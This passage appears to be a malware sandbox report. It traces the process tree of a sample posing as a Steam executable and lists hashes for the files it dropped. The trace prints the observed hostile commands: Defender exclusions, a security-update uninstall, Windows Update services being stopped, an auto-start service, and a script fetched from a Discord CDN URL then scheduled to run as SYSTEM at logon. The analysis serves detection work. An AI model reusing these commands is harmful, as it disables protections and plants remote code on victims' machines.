wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3200

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2956

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5336

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4340

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5008

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3708

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3224

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2772

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5500

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5304

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5456

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5364

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2296

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1944

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5668

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5440

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4004

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2088

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5808

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5056

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1588

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5504

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5328

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4036

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2176

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:6076

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2260

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4200

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1284

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5216

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5284

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5196

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4448

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5544

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:732

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5412

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:900

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3800

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2080

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5272

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3180

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:6136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3988

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5000

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:552

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3832

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4240

C:\Users\Admin\AppData\Roaming\efckgwgt.pjh1.exe
"C:\Users\Admin\AppData\Roaming\efckgwgt.pjh1.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4444

C:\Users\Admin\AppData\Roaming\efckgwgt.pjh2.exe
"C:\Users\Admin\AppData\Roaming\efckgwgt.pjh2.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:3448

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:1684

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1640

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:2292

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:2360

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:1872

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:1292

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:3868

C:\Users\Admin\AppData\Roaming\efckgwgt.pjh3.exe
"C:\Users\Admin\AppData\Roaming\efckgwgt.pjh3.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E2DE.tmp\E2DF.tmp\E2E0.bat C:\Users\Admin\AppData\Roaming\efckgwgt.pjh3.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4116

C:\Windows\system32\where.exe
where node
6⤵
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4404

C:\Windows\system32\msiexec.exe
msiexec /i nodejs-installer.msi /quiet
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3692

C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
6⤵
- Scheduled Task/Job: Scheduled Task
PID:3564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3596

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3784

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2952

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3340

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1216

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:640

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ffeccab4ef8,0x7ffeccab4f04,0x7ffeccab4f10
2⤵
PID:3992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1960,i,15316930299780304231,7592852768794498680,262144 --variations-seed-version --mojo-platform-channel-handle=3348 /prefetch:3
2⤵
PID:860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1416,i,15316930299780304231,7592852768794498680,262144 --variations-seed-version --mojo-platform-channel-handle=3104 /prefetch:8
2⤵
PID:3472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:368

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3652

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:64

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3848

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:852

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4608

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2948

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 9B7BF4A086A093492AA0B29195148257
2⤵
- Loads dropped DLL
PID:5840

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding E9D88CC90AB19A17B0566FFB84C358EA E Global\MSI0000
2⤵
- Loads dropped DLL
PID:424

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E466735DF04DFD9EAADCC7FB8E9C8761
2⤵
- Loads dropped DLL
PID:6028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5296

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 5348 -ip 5348
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1628

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3636

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:5316

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58725f.rbs
Filesize
823KB

MD5
b3d9d4169c2032536dbb300d79280e8d

SHA1
09d3aec1be4ca38416c4bd756aee9afe6b3898c0

SHA256
3add261c3f148fc0345bf4ef288e44591a532400f7ad2e0533b177c0a72bdc4e

SHA512
b319723fee592dccc9473de0b5cfd2657ce6a18296bab6631d508db91fe37f5f6085cfb49ea971f6f58b30d05c275cf6d389fc20cc980860451f84339e91757f

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE
Filesize
11KB

MD5
dfc1b916d4555a69859202f8bd8ad40c

SHA1
fc22b6ee39814d22e77fe6386c883a58ecac6465

SHA256
7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9

SHA512
1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js
Filesize
79B

MD5
24563705cc4bb54fccd88e52bc96c711

SHA1
871fa42907b821246de04785a532297500372fc7

SHA256
ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13

SHA512
2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
Filesize
754B

MD5
d2cf52aa43e18fdc87562d4c1303f46a

SHA1
58fb4a65fffb438630351e7cafd322579817e5e1

SHA256
45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

SHA512
54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license
Filesize
1KB

MD5
b862aeb7e1d01452e0f07403591e5a55

SHA1
b8765be74fea9525d978661759be8c11bab5e60e

SHA256
fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f

SHA512
885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license
Filesize
1KB

MD5
5ad87d95c13094fa67f25442ff521efd

SHA1
01f1438a98e1b796e05a74131e6bb9d66c9e8542

SHA256
67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

SHA512
7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md
Filesize
818B

MD5
2916d8b51a5cc0a350d64389bc07aef6

SHA1
c9d5ac416c1dd7945651bee712dbed4d158d09e1

SHA256
733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

SHA512
508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE
Filesize
780B

MD5
b020de8f88eacc104c21d6e6cacc636d

SHA1
20b35e641e3a5ea25f012e13d69fab37e3d68d6b

SHA256
3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

SHA512
4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE
Filesize
730B

MD5
072ac9ab0c4667f8f876becedfe10ee0

SHA1
0227492dcdc7fb8de1d14f9d3421c333230cf8fe

SHA256
2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

SHA512
f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
Filesize
802B

MD5
d7c8fab641cd22d2cd30d2999cc77040

SHA1
d293601583b1454ad5415260e4378217d569538e

SHA256
04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

SHA512
278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
Filesize
16KB

MD5
bc0c0eeede037aa152345ab1f9774e92

SHA1
56e0f71900f0ef8294e46757ec14c0c11ed31d4e

SHA256
7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

SHA512
5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json
Filesize
1KB

MD5
d116a360376e31950428ed26eae9ffd4

SHA1
192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

SHA256
c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

SHA512
5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE
Filesize
763B

MD5
7428aa9f83c500c4a434f8848ee23851

SHA1
166b3e1c1b7d7cb7b070108876492529f546219f

SHA256
1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

SHA512
c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json
Filesize
28B

MD5
56368b3e2b84dac2c9ed38b5c4329ec2

SHA1
f67c4acef5973c256c47998b20b5165ab7629ed4

SHA256
58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd

SHA512
d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json
Filesize
26B

MD5
2324363c71f28a5b7e946a38dc2d9293

SHA1
7eda542849fb3a4a7b4ba8a7745887adcade1673

SHA256
1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4

SHA512
7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js
Filesize
17KB

MD5
cf8f16c1aa805000c832f879529c070c

SHA1
54cc4d6c9b462ad2de246e28cd80ed030504353d

SHA256
77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573

SHA512
a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

Download Submit
